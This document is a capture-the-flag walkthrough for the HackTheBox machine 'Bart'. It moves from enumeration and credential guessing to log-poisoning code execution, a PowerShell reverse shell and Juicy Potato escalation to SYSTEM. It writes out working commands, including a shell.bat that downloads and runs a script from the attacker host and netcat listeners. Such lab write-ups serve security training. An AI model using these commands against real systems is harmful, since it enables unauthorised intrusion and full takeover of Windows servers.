Bart HTB
IP
10.10.10.81
Initial Nmap scan
sudo nmap -sV -sC -A -oA inital_nmap 10.10.10.81
Full Nmap scan
nmap -sV -p- -oA full_nmap_scan 10.10.10.81
Nothing new
Ports

80: HTTP
we can see nmap did not follow the redirect lets add domain to our hosts file
sudo vi /etc/hosts

to exit out of vim (just in case)
esc #esc button
:wq # write and quit
Now we have added to the hosts file let direct our attention to port 80 http
Port 80 HTTP
when we first land on the page if we look at wappalayzer we can see the technologies the web server is using

from what we can tell this web server
uses WordPress version 4.8.2
Has a MySQL database
Uses PHP
is an IIS server (Windows)
First thing let's perform some directory busting
feroxbuster -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.81 -x php -o dirs.txt
lets this run in the background
quick note
While running ferox buster I noticed I started to get a lot of
200
status codes and all of them resulted in the following

Dont get me wrong I love mercats as much as the next person, but i dont want this showing up in my results so lets modify our command a touch
feroxbuster -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.81 -x php -C 200 -o dirs.txt
-C: meaning exclude status code
200
let's let this run for a bit and come back to it later
Looking at the home page's source we can see some interesting notes left behind

We can make out some possible usernames
Harvey Potter
Developer@BART
h.potter@bart.htb
looking through the main web page we can see a few other staff members
Samantha Browm: CEO@bart
Daniel Simmons
Robert Hilton
Jane Doe: Developer@FluffyUnicorns
feroxbuster found a directory
/monitor/

so far we now
PHP Server Monitor v3.2.1
couldn't find any default creds but if we look at the forgotten password section and submit admin

we can see what particular users are on the system
let's refer to the staff we found on the web page and the page's source
woohoo! we found a user

if we try Harvey's last name potter
we are authenticated
Looks like it worked but we'll have to add the subdomain to our hosts file


Now we can log back in with Harvey's credentials
harvey: potter

if we look at the Servers tab we can see another subdomain

for good measures let's add this to our host's file
When we navigate to the
http://internal-01.bart.htb/
we are greeted with another login screen

as you can probably guess Harvey's creds dont work, we need a password with a minimum of eight characters
let's perform further directory busting
feroxbuster -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://internal-01.bart.htb/simple_chat/ -x php -o dirs.txt
Keep getting server issues most likely because we are not authenticated
Lets try some common creds with harvey
it actually worked
we found the creds for the login
harvey: Password1
When we log into the chat we can see the following

From what is discussed there seems to be development code on the server if we look at the page source

this looks promising
let's navigate to
http://internal-01.bart.htb/log/log.php?filename=log.txt&username=harvey

My first thought looks pretty static but playing around with URL parameters
we do get a response back

Wonder if we can add any further functionality to it
Let's use burp and catch a request
Looking at the request, I did try to modify both the filename and username parameters to see if I could inject php code but with no luck
but we can successfully inject php code within the user-agent

before we send this off we want to send it through repeater, Now we can add the parameter cmd=
and execute commands on the target system

we now have code execution on the target machine
Establishing a shell on the target system
alright lets set up our shell
we will use the nishang repo
https://github.com/samratashok/nishang.git
copy our reverse shell script into our working directory
cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 ./rev.ps1
edit our
Invoke-PowerShellTcp.ps1
script

we just added this little snippet so when the PowerShell script is executed it will automatically connect to our local machine
set up our python server
python3 -m http.server 9010
set up our netcat listener
nc -lvnp 9001
from burp let's pick up our
rev.ps1

Quick tip
Once you have typed your PowerShell command out highlight the command and press ctrl u to URL encoded it
we have a shell on the system

Privilege escalation Via iusr
let's run systeminfo
and feed it to Wes to see if we can find any exploits

copy and paste the output to a file on our local machine
update wes
python3 /opt/wesng/wes.py --update
let's feed it to Wes
python3 /opt/wesng/wes.py systeminfo.txt > possible_exploits
Found a number of exploits, but we will keep these in our back pocket in case we can't find anything
let's check for users on the system
net users

lets check our privileges
whoami /priv

as we can see SeImpersonatePriviege is enabled meaning we have a high chance of successfully using juicy potato to spawn a shell as nt authority.
alright let's download some fresh potatoes and get to it
Once we have the juicy potato executable on our local machine let's download it onto the target machine
start a python3 server
python3 -m http.server 9010
well use powershell to retrieve the potato
(new-object net.webclient).downloadfile('http://10.10.16.8:9010/jp.exe', 'C:\Users\Public\Downloads\jp.exe')
we should have our jp.exe (JuiceyPotato.exe) within the downloads directory

lets execute jp.exe
and see what parameters we need to set
-t createprocess call: we can do both
-p program to launch: we will execute a shell.bat file
-l Com Sever listen port: this can be say port 4444 on the local host
-c CLSID Since we now we are working on a Windows 10 pro machine we can use the following repo to test possible CLSIDs, well use the
{7A6D9C0A-1E7A-41B6-82B4-C3F7A27BA381}

Alright let's get our reverse shell ready
well just
cp rev.ps1 rev2.ps1
change the port for connection

Now we want to create a shell.bat
file which will run our rev.ps1
, it should contain
powershell -c iex(new-object net.webclient).downloadstring('http://10.10.16.8:9010/rev2.ps1')
Lets download our shell.bat
onto the target machine
set up a python server
python3 -m http.server 9010
From the target machine
(new-object net.webclient).downloadfile('http://10.10.16.8:9010/shell.bat', 'C:\Users\Public\Downloads\shell.bat')
start a Netcat listener
nc -lvnp 9002
alright we should have the necessary files on the target system
Let's execute jp.exe
./jp.exe -t * -p shell.bat -l 4444 -c "{7A6D9C0A-1E7A-41B6-82B4-C3F7A27BA381}"
we have a shell as nt authority\system

Last updated